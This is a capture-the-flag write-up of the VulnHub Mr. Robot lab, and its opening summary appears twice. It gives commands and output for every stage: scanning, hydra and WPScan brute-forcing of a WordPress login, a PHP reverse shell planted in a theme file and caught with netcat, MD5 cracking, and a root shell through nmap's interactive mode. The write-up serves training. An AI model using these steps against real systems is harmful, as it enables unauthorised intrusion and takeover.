Third Boot2Root Mr.Robot
Hello Folks!
Link to Box :-https://www.vulnhub.com/entry/mr-robot-1,151/
Rating:- Beginner-Intermediate
Time :- 2 hours (Majorly because of brute force)
Welcome to the Third Boot2Root, we start the box, do a arp-scan -l to find out what IP is the box running on, to nmap scan we found out this .
so we have a open port 80 without wasting much time lets get to it, this is how it looks gotta admin AMAZING visuals
http://192.168.0.100/fsocity.dic which is a dictionary file,maybe we can use it for bruteforcing let's save it
So we get an MD5 hash lets try to break this up, link for the decryptor :-
http://md5decrypt.net
so now we have a username and password we can try "su robot" with robot:abcdefghijklmnopqrstuvwxyz
but to "su robot" we need to spawn a shell we can do it by
Once you spawn a shell we can do this to get inside
YAY Flag 2: 822c73956184f694993bede3eb39f959
So once we got inside I enumerated further to find a nmap and we can use nmap to spawn a root shell and get the final flag!
and the final FLAG is :04787ddef27c3dee1ee161b21670b4e4
So that's it for the day!
Thank You!!
Link to Box :-https://www.vulnhub.com/entry/mr-robot-1,151/
Rating:- Beginner-Intermediate
Time :- 2 hours (Majorly because of brute force)
Welcome to the Third Boot2Root, we start the box, do a arp-scan -l to find out what IP is the box running on, to nmap scan we found out this .
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nmap -sV -O -A 192.168.0.100 | |
| Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-10 15:14 IST | |
| Nmap scan report for 192.168.0.100 | |
| Host is up (0.00038s latency). | |
| Not shown: 997 filtered ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp closed ssh | |
| 80/tcp open http Apache httpd | |
| |_http-server-header: Apache | |
| |_http-title: Site doesn't have a title (text/html). | |
| 443/tcp open ssl/http Apache httpd | |
| |_http-server-header: Apache | |
| |_http-title: Site doesn't have a title (text/html). | |
| | ssl-cert: Subject: commonName=www.example.com | |
| | Not valid before: 2015-09-16T10:45:03 | |
| |_Not valid after: 2025-09-13T10:45:03 | |
| MAC Address: 08:00:27:07:9E:BF (Oracle VirtualBox virtual NIC) | |
| Device type: general purpose | |
| Running: Linux 3.X|4.X | |
| OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 | |
| OS details: Linux 3.10 - 4.8 | |
| Network Distance: 1 hop | |
| TRACEROUTE | |
| HOP RTT ADDRESS | |
| 1 0.38 ms 192.168.0.100 | |
| OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
| Nmap done: 1 IP address (1 host up) scanned in 33.36 seconds | |
| So http 80 gives me this |
After watching all the pages nothing interesting strike up to me so, i followed the very basic step always check for "Robots.txt" and found this
So we came up with the first flag already?
Flag one :- 073403c8a58a1f80d943455fb30724b9
and second link is http://192.168.0.100/fsocity.dic which is a dictionary file,maybe we can use it for bruteforcing let's save it
so without wasting much time i head to running a dirb http://192.168.0.100 and came up with tons of link but i luckily saw "Admin" and it was a WP - page.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ---- Scanning URL: http://192.168.0.106/ ---- | |
| ==> DIRECTORY: http://192.168.0.106/0/ | |
| ==> DIRECTORY: http://192.168.0.106/admin/ | |
| + http://192.168.0.106/atom (CODE:301|SIZE:0) | |
| ==> DIRECTORY: http://192.168.0.106/audio/ | |
| ==> DIRECTORY: http://192.168.0.106/blog/ | |
| ==> DIRECTORY: http://192.168.0.106/css/ | |
| + http://192.168.0.106/dashboard (CODE:302|SIZE:0) | |
| + http://192.168.0.106/favicon.ico (CODE:200|SIZE:0) | |
| ==> DIRECTORY: http://192.168.0.106/feed/ | |
| ==> DIRECTORY: http://192.168.0.106/image/ | |
| ==> DIRECTORY: http://192.168.0.106/Image/ | |
| ==> DIRECTORY: http://192.168.0.106/images/ | |
| + http://192.168.0.106/index.html (CODE:200|SIZE:1188) | |
| + http://192.168.0.106/index.php (CODE:301|SIZE:0) | |
| + http://192.168.0.106/intro (CODE:200|SIZE:516314) | |
| ==> DIRECTORY: http://192.168.0.106/js/ | |
| + http://192.168.0.106/license (CODE:200|SIZE:19930) | |
| + http://192.168.0.106/login (CODE:302|SIZE:0) | |
| + http://192.168.0.106/page1 (CODE:301|SIZE:0) | |
| + http://192.168.0.106/phpmyadmin (CODE:403|SIZE:94) | |
| + http://192.168.0.106/rdf (CODE:301|SIZE:0) | |
| + http://192.168.0.106/readme (CODE:200|SIZE:7356) | |
| + http://192.168.0.106/robots (CODE:200|SIZE:41) | |
| + http://192.168.0.106/robots.txt (CODE:200|SIZE:41) | |
| + http://192.168.0.106/rss (CODE:301|SIZE:0) | |
| + http://192.168.0.106/rss2 (CODE:301|SIZE:0) | |
| + http://192.168.0.106/sitemap (CODE:200|SIZE:0) | |
| + http://192.168.0.106/sitemap.xml (CODE:200|SIZE:0) | |
| ==> DIRECTORY: http://192.168.0.106/video/ | |
| ==> DIRECTORY: http://192.168.0.106/wp-admin/ | |
| + http://192.168.0.106/wp-config (CODE:200|SIZE:0) | |
| ==> DIRECTORY: http://192.168.0.106/wp-content/ | |
| + http://192.168.0.106/wp-cron (CODE:200|SIZE:0) | |
| ==> DIRECTORY: http://192.168.0.106/wp-includes/ | |
| + http://192.168.0.106/wp-links-opml (CODE:200|SIZE:228) | |
| + http://192.168.0.106/wp-load (CODE:200|SIZE:0) | |
| + http://192.168.0.106/wp-login (CODE:200|SIZE:2675) | |
| + http://192.168.0.106/wp-mail (CODE:403|SIZE:3018) | |
| + http://192.168.0.106/wp-settings (CODE:500|SIZE:0) | |
| + http://192.168.0.106/wp-signup (CODE:302|SIZE:0) | |
| + http://192.168.0.106/xmlrpc (CODE:405|SIZE:42) | |
| + http://192.168.0.106/xmlrpc.php (CODE:405|SIZE:42) |
so no brainer step here let's start with WP-scan to see if we can find any users?
Unfortunately can't find any users so it's the time to use the file we got from the first page and try to bruteforce some username?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# wpscan -u http://192.168.0.106 --enumerate u | |
| _______________________________________________________________ | |
| __ _______ _____ | |
| \ \ / / __ \ / ____| | |
| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® | |
| \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ | |
| \ /\ / | | ____) | (__| (_| | | | | | |
| \/ \/ |_| |_____/ \___|\__,_|_| |_| | |
| WordPress Security Scanner by the WPScan Team | |
| Version 2.9.3 | |
| Sponsored by Sucuri - https://sucuri.net | |
| @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ | |
| _______________________________________________________________ | |
| [+] URL: http://192.168.0.106/ | |
| [+] Started: Tue Oct 10 16:56:25 2017 | |
| [+] robots.txt available under: 'http://192.168.0.106/robots.txt' | |
| [!] The WordPress 'http://192.168.0.106/readme.html' file exists exposing a version number | |
| [+] Interesting header: SERVER: Apache | |
| [+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN | |
| [+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523 | |
| [+] XML-RPC Interface available under: http://192.168.0.106/xmlrpc.php | |
| [+] WordPress version 4.3.12 (Released on 2017-09-19) identified from advanced fingerprinting, rss generator, rdf generator, atom generator, links opml | |
| [!] 1 vulnerability identified from the version number | |
| [!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset | |
| Reference: https://wpvulndb.com/vulnerabilities/8807 | |
| Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html | |
| Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html | |
| Reference: https://core.trac.wordpress.org/ticket/25239 | |
| Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295 | |
| [+] Enumerating plugins from passive detection ... | |
| [+] No plugins found | |
| [+] Enumerating usernames ... | |
| [+] We did not enumerate any usernames | |
| [+] Finished: Tue Oct 10 16:56:26 2017 | |
| [+] Requests Done: 56 | |
| [+] Memory used: 17.488 MB | |
| [+] Elapsed time: 00:00:01 |
I used hydra for this purpose
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hydra -L wordlist -p idontknow 192.168.0.106 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS:Invalid" | |
| [80][http-post-form] host: 192.168.0.106 login: Elliot password: idontknow | |
| [STATUS] 795.00 tries/min, 795 tries in 00:01h, 185569 to do in 03:54h, 16 active | |
| [80][http-post-form] host: 192.168.0.106 login: elliot password: idontknow |
I feed in the password as "idontknow" because for now i am interested in finding valid usernames only you can feed in whatever you like, so the username is :Elliot, let's use hydra again against this username to see if we can find any Password from the list?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wpscan -u 192.168.0.106 --wordlist /root/Desktop/mrrobot/wordlist --username Elliot | |
| +----+--------+------+----------+ | |
| | Id | Login | Name | Password | | |
| +----+--------+------+----------+ | |
| | | Elliot | |ER28-0652 | | |
| +----+--------+------+----------+ |
There we go Elliot:ER28-0652
so we are inside the page now we just need to put in the reverse shell and "nc -lvnp <PORT>" it to get a session.
Link to the shell http://pentestmonkey.net/tools/web-shells/php-reverse-shell
So let's change the IP address and put this file in Appearance > Editor > Footer.php
and we visit the http://192.168.0.106/admin/blog
and we get a session on the nc listener
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# nc -lvnp 4444 | |
| listening on [any] 4444 ... | |
| connect to [192.168.0.104] from (UNKNOWN) [192.168.0.106] 40750 | |
| Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux | |
| 12:53:19 up 2:15, 0 users, load average: 5.23, 8.54, 6.93 | |
| USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT | |
| uid=1(daemon) gid=1(daemon) groups=1(daemon) | |
| /bin/sh: 0: can't access tty; job control turned off | |
| $ pwd | |
| / | |
| $ ls | |
| bin | |
| boot | |
| dev | |
| etc | |
| home | |
| initrd.img | |
| lib | |
| lib64 | |
| lost+found | |
| media | |
| mnt | |
| opt | |
| proc | |
| root | |
| run | |
| sbin | |
| srv | |
| sys | |
| tmp | |
| usr | |
| var | |
| vmlinuz | |
| $ cd /home | |
| $ ls | |
| robot | |
| $ cd robot | |
| $ ls | |
| key-2-of-3.txt | |
| password.raw-md5 | |
| $ cat key-2-of-3.txt | |
| cat: key-2-of-3.txt: Permission denied | |
| $ cat password.raw-md5 | |
| robot:c3fcd3d76192e4007dfb496cca67e13b | |
| $ | |
http://md5decrypt.net
so now we have a username and password we can try "su robot" with robot:abcdefghijklmnopqrstuvwxyz
but to "su robot" we need to spawn a shell we can do it by
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python -c 'import pty; pty.spawn("/bin/bash")' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# nc -lvnp 4444 | |
| listening on [any] 4444 ... | |
| connect to [192.168.0.104] from (UNKNOWN) [192.168.0.106] 40767 | |
| Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux | |
| 13:15:44 up 2:37, 0 users, load average: 0.01, 0.13, 1.66 | |
| USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT | |
| uid=1(daemon) gid=1(daemon) groups=1(daemon) | |
| /bin/sh: 0: can't access tty; job control turned off | |
| $ python -c 'import pty; pty.spawn("/bin/bash")' | |
| daemon@linux:/$ su robot | |
| su robot | |
| Password: abcdefghijklmnopqrstuvwxyz | |
| robot@linux:/$ cd /home/robot | |
| cd /home/robot | |
| robot@linux:~$ cat key-2-of-3.txt | |
| cat key-2-of-3.txt | |
| 822c73956184f694993bede3eb39f959 | |
| robot@linux:~$ |
So once we got inside I enumerated further to find a nmap and we can use nmap to spawn a root shell and get the final flag!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| robot@linux:~$ nmap --version | |
| nmap --version | |
| nmap version 3.81 ( http://www.insecure.org/nmap/ ) | |
| robot@linux:~$ nmap --interactive | |
| nmap --interactive | |
| Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) | |
| Welcome to Interactive Mode -- press h <enter> for help | |
| nmap> !sh | |
| !sh | |
| # cd /root | |
| cd /root | |
| # ls | |
| ls | |
| firstboot_done key-3-of-3.txt | |
| # cat key-3-of-3.txt | |
| cat key-3-of-3.txt | |
| 04787ddef27c3dee1ee161b21670b4e4 | |
| # |
and the final FLAG is :04787ddef27c3dee1ee161b21670b4e4
So that's it for the day!
Thank You!!
Comments
Post a Comment